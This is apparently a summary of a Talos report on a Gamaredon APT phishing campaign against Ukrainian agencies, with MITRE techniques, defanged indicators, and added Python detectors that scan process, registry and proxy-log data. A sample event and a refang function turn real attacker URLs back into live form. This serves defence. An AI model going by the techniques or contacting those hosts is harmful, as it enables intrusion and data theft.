Gamaredon APT targets Ukrainian government agencies in new campaign

Cisco Talos reports a new Gamaredon APT campaign targeting Ukrainian government entities, leveraging spear-phishing with Russian invasion-themed Office documents and malicious VBScript macros to seed infection. The operation uses a multi-stage chain (LNK in RAR, mshta to fetch and run PowerShell/VBScript, then a custom infostealer with data-exfiltration and persistence) to exfiltrate files, capture screens, and deploy additional payloads. #Gamaredon #xsph.ru #celticso.ru #GammaLoad #GammaSteel #Ukraine #Talos

Keypoints

  • Attribution: Campaign linked to the Russia-connected Gamaredon APT targeting Ukraine.
  • Phishing lure: Malicious Microsoft Office documents with remote templates and VBScript macros deliver the initial access.
  • Infection chain: VBScript macros download RAR archives containing LNK files, which in turn trigger the next-stage payload.
  • Execution flow: LNKs and mshta.exe download/parse a remote XML to execute a PowerShell script and VBScript via a staged sequence.
  • Capabilities: A PowerShell-based instrumentor decodes and executes commands, captures screens, and communicates with a C2 server to receive more payloads.
  • Infostealer: A new Gamaredon infostealer exfiltrates a wide range of file types, stores metadata, and uses a hardcoded C2 URL for exfiltration.

MITRE Techniques

  • [T1566.001] Phishing – Spearphishing Attachment – “phishing emails to deliver Microsoft Office documents containing remote templates with malicious VBScript macros.”
  • [T1059.005] VBScript – Macros in Office documents download and execute next-stage payloads via LNK in RAR archives.
  • [T1218.005] Mshta – Signed Binary Proxy Execution: Mshta used to “download and parse a remote XML file to execute a malicious PowerShell script.”
  • [T1059.001] PowerShell – Instrumentor script decodes and executes commands and VBScript via C2.
  • [T1027] Obfuscated/Compressed Files and Information – XOR-based decoding and obfuscation of payloads.
  • [T1113] Screen Capture – Repeatedly captures the current user’s screen with System.Windows.Forms.
  • [T1082] System Information Discovery – Collects computer name and volume serial number for exfiltration and C2 control.
  • [T1041] Exfiltration Over C2 Channel – Exfiltrates system info, base64-encoded screenshots, and other data to a C2 URL.
  • [T1547.001] Registry Run Keys/Startup Folder – Persistence via HKCU Run key named “Windows Task.”
  • [T1083] File and Directory Discovery – Enumerates files across drives, excluding certain system folders.
  • [T1071.001] Web Protocols – C2 communications over HTTP(S) for payload delivery; the Get-IP function and DNS lookups resolve the C2 IPs before contact.
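The techniques above describe a chain a defender can look for in endpoint telemetry: an Office process spawning mshta.exe, mshta.exe being handed a remote .xml URL, and an HKCU Run value named "Windows Task" that launches a script host. The following is an added illustration, not code from Talos or from the report; the events are constructed Sysmon-style records (field names `parent`, `image`, `cmdline`, `key`, `value_name`, `data` are assumptions of this example) and the detection functions are this example's own.

```python
import re

# Constructed sample telemetry (Sysmon-style field names). These are not
# events from the Talos report, only illustrations of the chain it describes.
SAMPLE_EVENTS = [
    {"type": "process",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": 'mshta.exe "http://a0698649.xsph.ru/barley/barley.xml"'},
    {"type": "process",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\u\AppData\Local\Temp\setup.hta"},
    {"type": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value_name": "Windows Task",
     "data": r'"C:\Windows\System32\wscript.exe" //B C:\Users\u\AppData\Roaming\upd.vbs'},
    {"type": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value_name": "OneDrive",
     "data": r'"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
REMOTE_XML = re.compile(r'https?://[^\s"\']+\.xml\b', re.IGNORECASE)
FIRST_TOKEN = re.compile(r'^\s*(?:"([^"]+)"|(\S+))')  # quoted path or bare token


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def launched_image(cmdline):
    """Image a Run-key value or command line starts; handles quoted paths."""
    m = FIRST_TOKEN.match(cmdline)
    return basename(m.group(1) or m.group(2)) if m else ""


def check_process(ev):
    """T1218.005 checks: Office -> mshta.exe, and mshta.exe given a remote XML."""
    findings = []
    if basename(ev["image"]) == "mshta.exe":
        if basename(ev["parent"]) in OFFICE_PARENTS:
            findings.append("T1218.005: Office process spawned mshta.exe")
        if REMOTE_XML.search(ev["cmdline"]):
            findings.append("T1218.005: mshta.exe fetching a remote XML file")
    return findings


def check_registry(ev):
    """T1547.001 checks on HKCU Run values: the reported name, and script hosts."""
    findings = []
    if ev["key"].lower().endswith(r"\currentversion\run"):
        if ev["value_name"].lower() == "windows task":
            findings.append("T1547.001: Run value named 'Windows Task'")
        if launched_image(ev["data"]) in SCRIPT_HOSTS:
            findings.append("T1547.001: Run value launches a script host")
    return findings


def scan(events):
    """Map event index -> findings, only for events that triggered a check."""
    results = {}
    for i, ev in enumerate(events):
        f = check_process(ev) if ev["type"] == "process" else check_registry(ev)
        if f:
            results[i] = f
    return results


if __name__ == "__main__":
    for i, f in scan(SAMPLE_EVENTS).items():
        print(i, f)
```

The two mshta.exe checks are independent on purpose: the parent-process check survives a change of hosting URL, and the remote-XML check survives a change of lure document, so a rewrite of one stage does not blind both.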

Indicators of Compromise

  • [Hash] Malicious Documents – 4aa2c783ae3d2d58f12d5e89282069533a80a7ba6f7fe6c548c6230a9601e650
  • [Hash] LNK Files – 581ed090237b314a9f5cd65076cd876c229e1d51328a24effd9c8d812eaebe6a
  • [Hash] LNK Files – 34bf1a232870df28809597d49a70d9b549d776e1e4beb3308ff6d169a59ecd02
  • [Hash] LNK – 78c6b489ac6cebf846aab3687bbe64801fdf924f36f312802c6bb815ed6400ba
  • [Hash] LNK – 1cb2d299508739ae85d655efd6470c7402327d799eb4b69974e2efdb9226e447
  • [Hash] LNK – a9916af0476243e6e0dbef9c45b955959772c4d18b7d1df583623e06414e53b7
  • [Hash] LNK – 8294815c2342ff11739aff5a55c993f5dd23c6c7caff2ee770e69e88a7c4cb6a
  • [Hash] LNK – be79d470c081975528c0736a0aa10214e10e182c8948bc4526138846512f19e7
  • [Hash] LNK – 5264e8a8571fe0ef689933b8bc2ebe46b985c9263b24ea34e306d54358380cbb
  • [Hash] LNK – ff7e8580ce6df5d5f5a2448b4646690a6f6d66b1db37f887b451665f4115d1a2
  • [Hash] LNK – 1ec69271abd8ebd1a42ac1c2fa5cdd9373ff936dc73f246e7f77435c8fa0f84c
  • [URL] Malicious – hxxp://a0698649.xsph[.]ru/barley/barley.xml
  • [URL] Malicious – hxxp://a0700343.xsph[.]ru/new/preach.xml
  • [URL] Malicious – hxxp://a0700462.xsph[.]ru/grow/guests.xml
  • [URL] Malicious – hxxp://a0700462.xsph[.]ru/seek/lost.xml
  • [URL] Malicious – hxxp://a0701919.xsph[.]ru/head/selling.xml
  • [URL] Malicious – hxxp://a0701919.xsph[.]ru/predator/decimal.xml
  • [URL] Malicious – hxxp://a0701919.xsph[.]ru/registry/prediction.xml
  • [URL] Malicious – hxxp://a0704093.xsph[.]ru/basement/insufficient.xml
  • [URL] Malicious – hxxp://a0704093.xsph[.]ru/bass/grudge.xml
  • [URL] Malicious – hxxp://a0705076.xsph[.]ru/ramzeses1.html
  • [URL] Malicious – hxxp://a0705076.xsph[.]ru/regiment.txt
  • [URL] Malicious – hxxp://a0705269.xsph[.]ru/bars/dearest.txt
  • [URL] Malicious – hxxp://a0705269.xsph[.]ru/instruct/deaf.txt
  • [URL] Malicious – hxxp://a0705269.xsph[.]ru/prok/gur.html
  • [URL] Malicious – hxxp://a0705581.xsph[.]ru/guinea/preservation.txt
  • [URL] Malicious – hxxp://a0705880.xsph[.]ru/band/sentiment.txt
  • [URL] Malicious – hxxp://a0705880.xsph[.]ru/based/pre.txt
  • [URL] Malicious – hxxp://a0705880.xsph[.]ru/selection/seedling.txt
  • [URL] Malicious – hxxp://a0706248.xsph[.]ru/reject/headlong.txt
  • [URL] Malicious – hxxp://a0707763.xsph[.]ru/decipher/prayer.txt
  • [Domain] Malicious – celticso[.]ru
  • [IP] Additional Drop Site – 162[.]33[.]178[.]129
  • [IP] Additional Drop Site – 155[.]138[.]252[.]221
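The indicators above are defanged (hxxp, [.]), so they need refanging before they can be matched against logs. The following is an added example, not code from Talos or the report: it refangs a subset of the listed URLs, hosts and hashes, then checks constructed proxy log lines and a constructed file inventory against them. The lower-confidence "xsph-pattern" tier is this example's own assumption, derived from the shape of the listed hosts (a + seven digits on xsph.ru), and flags sibling hosts for review rather than as confirmed indicators.

```python
import re

# Indicators copied from the list above, still in defanged form.
DEFANGED_URLS = [
    "hxxp://a0698649.xsph[.]ru/barley/barley.xml",
    "hxxp://a0705076.xsph[.]ru/regiment.txt",
    "hxxp://a0707763.xsph[.]ru/decipher/prayer.txt",
]
DEFANGED_HOSTS = ["celticso[.]ru", "162[.]33[.]178[.]129", "155[.]138[.]252[.]221"]
KNOWN_HASHES = {
    "4aa2c783ae3d2d58f12d5e89282069533a80a7ba6f7fe6c548c6230a9601e650",  # document
    "581ed090237b314a9f5cd65076cd876c229e1d51328a24effd9c8d812eaebe6a",  # LNK
}

HOST_RE = re.compile(r"^https?://([^/:]+)")
# Assumed hunting heuristic: sibling accounts on the same shared hosting.
XSPH_SIBLING = re.compile(r"a\d{7}\.xsph\.ru")


def refang(ioc):
    """Turn hxxp:// and [.] back into a matchable URL or host."""
    return ioc.replace("hxxp", "http").replace("[.]", ".")


def build_watchlist():
    """Exact URLs plus every host that appears in a URL or on its own."""
    urls = {refang(u) for u in DEFANGED_URLS}
    hosts = {refang(h) for h in DEFANGED_HOSTS}
    hosts |= {HOST_RE.match(u).group(1) for u in urls}
    return urls, hosts


# Constructed proxy log (not from the report): ts client method url status
SAMPLE_PROXY_LOG = """\
2022-09-15T10:01:02Z 10.0.0.5 GET http://a0698649.xsph.ru/barley/barley.xml 200
2022-09-15T10:01:09Z 10.0.0.5 GET http://a0705076.xsph.ru/regiment.txt 200
2022-09-15T10:02:30Z 10.0.0.7 GET https://www.example.com/index.html 200
2022-09-15T10:03:11Z 10.0.0.9 GET http://a0709999.xsph.ru/other/file.txt 200
2022-09-15T10:04:40Z 10.0.0.9 GET http://celticso.ru/x 200
"""

# Constructed file inventory (not from the report): (path, sha256)
SAMPLE_INVENTORY = [
    (r"C:\Users\u\Downloads\order.docx",
     "4aa2c783ae3d2d58f12d5e89282069533a80a7ba6f7fe6c548c6230a9601e650"),
    (r"C:\Users\u\Downloads\notes.txt", "0" * 64),
]


def scan_proxy_log(text):
    """Return (client, url, tier) for each line that matches the watchlist."""
    urls, hosts = build_watchlist()
    hits = []
    for line in text.splitlines():
        _, client, _, url, _ = line.split()
        host = HOST_RE.match(url).group(1).lower()
        if url in urls:
            hits.append((client, url, "url"))
        elif host in hosts:
            hits.append((client, url, "host"))
        elif XSPH_SIBLING.fullmatch(host):
            hits.append((client, url, "xsph-pattern"))  # review, not confirmed
    return hits


def scan_inventory(items):
    """Return the (path, sha256) pairs whose hash is a listed indicator."""
    return [(path, sha) for path, sha in items if sha.lower() in KNOWN_HASHES]


if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(hit)
    for hit in scan_inventory(SAMPLE_INVENTORY):
        print(hit)
```

Matching on the host as well as the full URL matters here because the listed paths are throwaway names (barley.xml, regiment.txt) that are cheap for the operator to rotate, while the hosting account is the more stable part of the indicator.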

Read more: https://blog.talosintelligence.com/2022/09/gamaredon-apt-targets-ukrainian-agencies.html